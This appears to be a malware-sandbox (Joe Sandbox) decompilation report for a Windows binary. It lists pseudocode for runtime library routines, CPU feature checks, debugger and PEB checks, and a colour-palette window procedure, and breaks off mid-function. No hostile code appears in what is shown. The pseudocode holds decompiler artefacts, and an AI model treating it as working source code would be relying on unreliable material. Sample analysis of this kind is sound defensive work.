                                              • Instruction ID: 848ec15288b6de2e631a85e1eaac00ea143c5a18797a0a4d525b96d4d5696a9a
                                              • Opcode Fuzzy Hash: 2c2784d2ecf431b48aa1493d6e8a09912a790838d45e40f36d11ef52c3a37237
                                              • Instruction Fuzzy Hash: D6311675D4521C9BDB10EFA8D989BCDBBF8AF08304F5040EAE40DAB250EB709A85CF45
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B237DA Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 79%
                                              			E00B237DA(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0xb34050; // 0x245fde3e
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00B1D6A0(_t41);
					_pop(_t61);
				}
				E00B1FC30(_t66,  &_v804, 0, 0x50);
				E00B1FC30(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x4
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -808
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00B1D6A0(_t57);
				}
				return E00B1DB25(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}






































                                              0x00b237da
                                              0x00b237da
                                              0x00b237da
                                              0x00b237e5
                                              0x00b237ea
                                              0x00b237ec
                                              0x00b237f4
                                              0x00b237f6
                                              0x00b237f9
                                              0x00b237fe
                                              0x00b237fe
                                              0x00b2380a
                                              0x00b2381d
                                              0x00b2382b
                                              0x00b23831
                                              0x00b23837
                                              0x00b2383d
                                              0x00b23843
                                              0x00b23849
                                              0x00b2384f
                                              0x00b23855
                                              0x00b2385b
                                              0x00b23861
                                              0x00b23868
                                              0x00b2386f
                                              0x00b23876
                                              0x00b2387d
                                              0x00b23884
                                              0x00b2388b
                                              0x00b2388c
                                              0x00b23895
                                              0x00b2389b
                                              0x00b2389b
                                              0x00b2389e
                                              0x00b238a4
                                              0x00b238b1
                                              0x00b238ba
                                              0x00b238c3
                                              0x00b238cc
                                              0x00b238da
                                              0x00b238dc
                                              0x00b238e2
                                              0x00b238f1
                                              0x00b238fd
                                              0x00b23900
                                              0x00b23905
                                              0x00b23912

                                              APIs
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00B238D2
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00B238DC
                                              • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,?), ref: 00B238E9
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: b9a3fd183835b8264eb7007425999d3f7f0cf52f0019fe061ce369f1ace72047
                                              • Instruction ID: e5863cf4d26c2c55b2a83eefe1305856247ee24e3497526c13351bbfeeff40c5
                                              • Opcode Fuzzy Hash: b9a3fd183835b8264eb7007425999d3f7f0cf52f0019fe061ce369f1ace72047
                                              • Instruction Fuzzy Hash: FB31A07590122DABCB21DF68D989BCDBBF8EF18710F5041EAA41DA7250EB749B818F44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1D945 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 88%
                                              			E00B1D945(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0xb35aa0 =  *0xb35aa0 & 0x00000000;
				 *0xb34058 =  *0xb34058 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0xb35aa4; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0xb35aa4 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0xb34058; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0xb35aa0 = 1;
					 *0xb34058 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0xb35aa0 = 2;
						 *0xb34058 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0xb34058; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0xb35aa0 = 3;
								 *0xb34058 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0xb35aa0 = 5;
									 *0xb34058 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0xb34058 =  *0xb34058 | 0x00000040;
										 *0xb35aa0 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0xb35aa4; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0xb35aa4 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}






























                                              0x00b1d945
                                              0x00b1d948
                                              0x00b1d952
                                              0x00b1d963
                                              0x00b1db15
                                              0x00b1db18
                                              0x00b1db18
                                              0x00b1d969
                                              0x00b1d96f
                                              0x00b1d974
                                              0x00b1d978
                                              0x00b1d97c
                                              0x00b1d97e
                                              0x00b1d980
                                              0x00b1d983
                                              0x00b1d988
                                              0x00b1d991
                                              0x00b1d9a2
                                              0x00b1d9ad
                                              0x00b1d9b3
                                              0x00b1d9b4
                                              0x00b1d9ba
                                              0x00b1d9bd
                                              0x00b1d9c7
                                              0x00b1d9ca
                                              0x00b1d9cd
                                              0x00b1d9d0
                                              0x00b1da15
                                              0x00b1da15
                                              0x00b1da1b
                                              0x00b1da1b
                                              0x00b1da20
                                              0x00b1da21
                                              0x00b1da27
                                              0x00b1da59
                                              0x00b1da29
                                              0x00b1da2b
                                              0x00b1da2c
                                              0x00b1da32
                                              0x00b1da35
                                              0x00b1da37
                                              0x00b1da3a
                                              0x00b1da3d
                                              0x00b1da40
                                              0x00b1da43
                                              0x00b1da4c
                                              0x00b1da51
                                              0x00b1da51
                                              0x00b1da4c
                                              0x00b1da5c
                                              0x00b1da61
                                              0x00b1da64
                                              0x00b1da6e
                                              0x00b1da79
                                              0x00b1da7f
                                              0x00b1da82
                                              0x00b1da8c
                                              0x00b1da97
                                              0x00b1daa3
                                              0x00b1daa6
                                              0x00b1daa9
                                              0x00b1dab4
                                              0x00b1dab9
                                              0x00b1dabb
                                              0x00b1dac0
                                              0x00b1dac3
                                              0x00b1dacd
                                              0x00b1dad5
                                              0x00b1dada
                                              0x00b1dae4
                                              0x00b1daf2
                                              0x00b1db05
                                              0x00b1db0c
                                              0x00b1db0c
                                              0x00b1daf2
                                              0x00b1dad5
                                              0x00b1dab9
                                              0x00b1da97
                                              0x00000000
                                              0x00b1db14
                                              0x00b1d9d5
                                              0x00b1d9df
                                              0x00b1da04
                                              0x00b1da0a
                                              0x00b1da0d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B1D95B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: FeaturePresentProcessor
                                              • String ID:
                                              • API String ID: 2325560087-0
                                              • Opcode ID: aff2fdd9f1a097f40718136ead3bb74156b6296bb75cd174e7d29db41fbd605b
                                              • Instruction ID: 63d48fa246e2c382acf5a2f8ce02e9326920847b9554679d20602886814449bb
                                              • Opcode Fuzzy Hash: aff2fdd9f1a097f40718136ead3bb74156b6296bb75cd174e7d29db41fbd605b
                                              • Instruction Fuzzy Hash: 7D518EB1A15609CFEB28CF58D8C17AEBBF0FB44310F6585AAD516EB250D774AD80CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1B830 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: KeyboardState
                                              • String ID:
                                              • API String ID: 1724228437-0
                                              • Opcode ID: 0a7531c91515f714856891bf879510901b71c42e82e76776f52f76c9728f835a
                                              • Instruction ID: 65b9612bcec391b3842c6cd1be86c40e440126779f6b8509a866e09378c0b2f3
                                              • Opcode Fuzzy Hash: 0a7531c91515f714856891bf879510901b71c42e82e76776f52f76c9728f835a
                                              • Instruction Fuzzy Hash: 1B31A871A10248AFEB51CFA9C596BEC7BF0FB01341F1844A5E4D4DB291C238DB90DB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B2258B Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00B2258B() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xb362dc = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                              0x00b2258b
                                              0x00b22593
                                              0x00b2259b

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: HeapProcess
                                              • String ID:
                                              • API String ID: 54951025-0
                                              • Opcode ID: 673de8a3a358805b645c9241645fe49892d76ac5c302c988796bc45ceae64061
                                              • Instruction ID: 83a62c39cb0426539facc59d601431c5d037e11b674efdf31d6729ad9f3a794d
                                              • Opcode Fuzzy Hash: 673de8a3a358805b645c9241645fe49892d76ac5c302c988796bc45ceae64061
                                              • Instruction Fuzzy Hash: 9EA012302012409F43004F355D0420D379C598218071580245000C6020DE2044449F00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B2418D Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00B2418D(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E00B22329(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}






                                              0x00b2419a
                                              0x00b2419c
                                              0x00b2419f
                                              0x00b241a2
                                              0x00b241a5
                                              0x00b241b6
                                              0x00b241b8
                                              0x00b241a7
                                              0x00b241ab
                                              0x00b241b4
                                              0x00000000
                                              0x00000000
                                              0x00b241b4
                                              0x00b241bd

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d2ad5c32dc7646e2450354e1ffd7f211a2991837c3e3f6e2b6b4411862f7e83d
                                              • Instruction ID: e3a2678934a08416013f03325129d8e68d00a20a37d668aef4faaded8bd80c95
                                              • Opcode Fuzzy Hash: d2ad5c32dc7646e2450354e1ffd7f211a2991837c3e3f6e2b6b4411862f7e83d
                                              • Instruction Fuzzy Hash: 11E04632911238EBCB25DB88A90498AB6ECEB44F01B11459AB505E3200C2B0DE40C7D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B2009E Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00B2009E(void* __ecx, void* __eflags) {

				if(E00B2418D(__ecx) == 1 || ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) != 0) {
					return 0;
				} else {
					return 1;
				}
			}



                                              0x00b200a6
                                              0x00b200bf
                                              0x00b200ba
                                              0x00b200bc
                                              0x00b200bc

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a70851e5609c448e8c58597b19ee992f77326b5201e67141dc45e8f64a1dd04d
                                              • Instruction ID: 6cf85ba94be762b75e0d507d24658a83948b1303333310648e727876caf31c5b
                                              • Opcode Fuzzy Hash: a70851e5609c448e8c58597b19ee992f77326b5201e67141dc45e8f64a1dd04d
                                              • Instruction Fuzzy Hash: F2C08C34010B2457EE29A910A2713A673DAE7A1BC2F8008CDC41A0BB43D72F9C82DB42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1BF30 Relevance: 42.3, APIs: 28, Instructions: 296COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              C-Code - Quality: 48%
                                              			E00B1BF30(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
				long _v12;
				long _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _v124;
				void* _v128;
				intOrPtr _v132;
				long _v136;
				signed int _v140;
				void* _v144;
				struct tagRECT _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _v176;
				void* _v180;
				void* _v184;
				signed int* _v188;
				void* _v204;
				RECT* _v208;
				intOrPtr _v212;
				signed int _v216;
				signed int _v228;
				signed int _v232;
				signed int _v240;
				intOrPtr _v244;
				void* _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v276;
				signed int _v280;
				void* _v292;
				void* _v296;
				int _t176;
				long _t186;
				struct HBRUSH__* _t208;
				long _t214;
				void* _t218;
				intOrPtr _t236;
				void* _t245;
				void* _t326;
				struct HDC__** _t330;
				struct HDC__** _t332;
				struct HDC__** _t336;
				struct HDC__** _t337;
				struct HDC__** _t338;
				struct HDC__** _t341;
				struct HDC__** _t342;
				void* _t343;
				struct HDC__** _t344;

				_t176 = _a8;
				_v160 = _t176;
				if(_t176 == 0xf) {
					BeginPaint(_a4,  &_v80);
					GetClientRect(_a4,  &_v96);
					asm("cdq");
					_v120 = _v96.right / 8;
					_t186 = GetWindowLongW(GetParent(_a4), 8);
					_t330 = _t326 - 0xfffffffffffffff4;
					_v16 = _t186;
					_v116 = 0;
					while(_v116 < 0x10) {
						asm("cdq");
						_v168 = _v116 / 8;
						asm("cdq");
						_v108 = _v168 * _v96.bottom / 2;
						_v164 = _v108;
						asm("cdq");
						_v100 = _v164 + _v96.bottom / 2;
						_v112 = (_v116 & 0x00000007) * _v120;
						_v104 = _v112 + _v120;
						_t208 = CreateSolidBrush( *(_v16 + 4 + _v116 * 4));
						_t332 = _t330 - 4;
						_v124 = _t208;
						 *_t332 = _v80.hdc;
						_v188 =  &_v112;
						_v184 = _v124;
						FillRect(??, ??, ??);
						DeleteObject(_v124);
						_t214 = GetWindowLongW(_a4, 0);
						_t330 = _t332;
						if(_t214 == _v116) {
							_v132 = 2;
							_t218 = SelectObject(_v80.hdc, GetStockObject(6));
							_t336 = _t330 - 0xfffffffffffffffc;
							_v128 = _t218;
							_v104 = _v104 + 0xffffffff;
							_v100 = _v100 + 0xffffffff;
							while(1) {
								 *_t336 = _v80.hdc;
								_v216 = _v112;
								_v212 = _v100;
								_v208 = 0;
								MoveToEx(??, ??, ??, ??);
								_t337 = _t336 - 0x10;
								 *_t337 = _v80.hdc;
								_v232 = _v112;
								_v228 = _v108;
								LineTo(??, ??, ??);
								_t338 = _t337 - 0xc;
								 *_t338 = _v80.hdc;
								_v244 = _v104;
								_v240 = _v108;
								LineTo(??, ??, ??);
								SelectObject(_v80.hdc, GetStockObject(7));
								_t341 = _t338;
								 *_t341 = _v80.hdc;
								_v268 = _v104;
								_v264 = _v100;
								LineTo(??, ??, ??);
								_t342 = _t341 - 0xc;
								 *_t342 = _v80.hdc;
								_v280 = _v112;
								_v276 = _v100;
								LineTo(??, ??, ??);
								_t343 = _t342 - 0xc;
								_t236 = _v132 + 0xffffffff;
								_v132 = _t236;
								if(_t236 == 0) {
									break;
								}
								_v112 = _v112 + 1;
								_v108 = _v108 + 1;
								_v104 = _v104 + 0xffffffff;
								_v100 = _v100 + 0xffffffff;
								_t245 = GetStockObject(6);
								_t344 = _t343 - 4;
								 *_t344 = _v80.hdc;
								_v296 = _t245;
								SelectObject(??, ??);
								_t336 = _t344 - 8;
							}
							SelectObject(_v80, _v128);
							_t330 = _t343 - 8;
						}
						_v116 = _v116 + 1;
					}
					EndPaint(_a4,  &_v80);
					goto L17;
				} else {
					if(_v160 == 0x201) {
						GetClientRect(_a4,  &_v156);
						asm("cdq");
						_v140 = _v156.right / 8;
						_v172 = _a16 >> 0x00000010 & 0xffff;
						asm("cdq");
						_t262 =  >=  ? 8 : 0;
						_v136 =  >=  ? 8 : 0;
						asm("cdq");
						_v136 = (_a16 & 0xffff) / _v140 + _v136;
						SetWindowLongW(_a4, 0, _v136);
						InvalidateRect(GetDlgItem(GetParent(_a4), 0x206), 0, 0);
						InvalidateRect(_a4, 0, 0);
						L17:
						_v12 = 0;
					} else {
						_v12 = DefWindowProcW(_a4, _a8, _a12, _a16);
					}
				}
				return _v12;
			}




























































                                              0x00b1bf46
                                              0x00b1bf49
                                              0x00b1bf52
                                              0x00b1bf80
                                              0x00b1bf96
                                              0x00b1bfa7
                                              0x00b1bfaa
                                              0x00b1bfc7
                                              0x00b1bfcd
                                              0x00b1bfd0
                                              0x00b1bfd3
                                              0x00b1bfda
                                              0x00b1bfec
                                              0x00b1bfef
                                              0x00b1bffd
                                              0x00b1c00b
                                              0x00b1c011
                                              0x00b1c01f
                                              0x00b1c02c
                                              0x00b1c039
                                              0x00b1c042
                                              0x00b1c052
                                              0x00b1c058
                                              0x00b1c05b
                                              0x00b1c067
                                              0x00b1c06a
                                              0x00b1c06e
                                              0x00b1c072
                                              0x00b1c081
                                              0x00b1c09a
                                              0x00b1c0a0
                                              0x00b1c0a6
                                              0x00b1c0ac
                                              0x00b1c0cd
                                              0x00b1c0d3
                                              0x00b1c0d6
                                              0x00b1c0df
                                              0x00b1c0e8
                                              0x00b1c0eb
                                              0x00b1c0f6
                                              0x00b1c0f9
                                              0x00b1c0fd
                                              0x00b1c101
                                              0x00b1c109
                                              0x00b1c10f
                                              0x00b1c11b
                                              0x00b1c11e
                                              0x00b1c122
                                              0x00b1c126
                                              0x00b1c12c
                                              0x00b1c138
                                              0x00b1c13b
                                              0x00b1c13f
                                              0x00b1c143
                                              0x00b1c166
                                              0x00b1c16c
                                              0x00b1c178
                                              0x00b1c17b
                                              0x00b1c17f
                                              0x00b1c183
                                              0x00b1c189
                                              0x00b1c195
                                              0x00b1c198
                                              0x00b1c19c
                                              0x00b1c1a0
                                              0x00b1c1a6
                                              0x00b1c1ac
                                              0x00b1c1af
                                              0x00b1c1b5
                                              0x00000000
                                              0x00000000
                                              0x00b1c1c6
                                              0x00b1c1cf
                                              0x00b1c1d8
                                              0x00b1c1e1
                                              0x00b1c1eb
                                              0x00b1c1f1
                                              0x00b1c1f7
                                              0x00b1c1fa
                                              0x00b1c1fe
                                              0x00b1c204
                                              0x00b1c204
                                              0x00b1c219
                                              0x00b1c21f
                                              0x00b1c21f
                                              0x00b1c22d
                                              0x00b1c22d
                                              0x00b1c242
                                              0x00000000
                                              0x00b1bf58
                                              0x00b1bf68
                                              0x00b1c260
                                              0x00b1c274
                                              0x00b1c277
                                              0x00b1c28b
                                              0x00b1c29c
                                              0x00b1c2b0
                                              0x00b1c2b3
                                              0x00b1c2c4
                                              0x00b1c2d1
                                              0x00b1c2f1
                                              0x00b1c332
                                              0x00b1c353
                                              0x00b1c38d
                                              0x00b1c38d
                                              0x00b1bf6e
                                              0x00b1c385
                                              0x00b1c385
                                              0x00b1bf68
                                              0x00b1c39f

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: Rect$Window$LongObject$ClientInvalidateParent$BeginBrushCreateDeleteFillItemPaintProcSelectSolidStock
                                              • String ID:
                                              • API String ID: 88183673-0
                                              • Opcode ID: fc267d4952ad0f2efcd7e8d8740b12dc93e2ed3a74eb4603dbcac7476299d87b
                                              • Instruction ID: bb6d82cca0f0a7bb85f95a4386a2221fbdd94319ed0e82db42415277c7912078
                                              • Opcode Fuzzy Hash: fc267d4952ad0f2efcd7e8d8740b12dc93e2ed3a74eb4603dbcac7476299d87b
                                              • Instruction Fuzzy Hash: 8BD16EB59043189FCB14EFACD58969DBBF1BB48300F20896DE899EB350DB349994CF46
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1AE30 Relevance: 31.7, APIs: 21, Instructions: 226windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              C-Code - Quality: 49%
                                              			E00B1AE30(struct HMENU__* _a4, intOrPtr _a8) {
				int _v8;
				struct HINSTANCE__* _v12;
				struct HMENU__* _v16;
				short _v528;
				void* _v536;
				void* _v540;
				void* _v544;
				int _v548;
				int _v552;
				int _v556;
				int _v560;
				int _v564;
				int _v568;
				int _v572;
				WCHAR* _v576;
				int _v580;
				struct HINSTANCE__* _t129;
				int _t131;
				int _t135;
				int _t139;
				int _t143;
				int _t147;
				int _t151;
				int _t155;
				int _t159;
				int _t163;
				void* _t199;
				void* _t200;
				void* _t218;
				struct HINSTANCE__** _t225;
				struct HMENU__** _t226;

				_t129 = GetModuleHandleW(0);
				_t200 = _t199 - 4;
				_v12 = _t129;
				if(_a4 != 0) {
					_v16 = CreateMenu();
					if(_v16 != 0) {
						_t131 =  &_v528;
						_v548 = _t131;
						0x710000();
						LoadStringW(_v12, 0x110,  &_v528, _t131);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x110,  &_v528);
						_t135 =  &_v528;
						_v552 = _t135;
						0x710000();
						LoadStringW(_v12, 0x111,  &_v528, _t135);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x111,  &_v528);
						_t139 =  &_v528;
						_v556 = _t139;
						0x710000();
						LoadStringW(_v12, 0x112,  &_v528, _t139);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x112,  &_v528);
						_t143 =  &_v528;
						_v560 = _t143;
						0x710000();
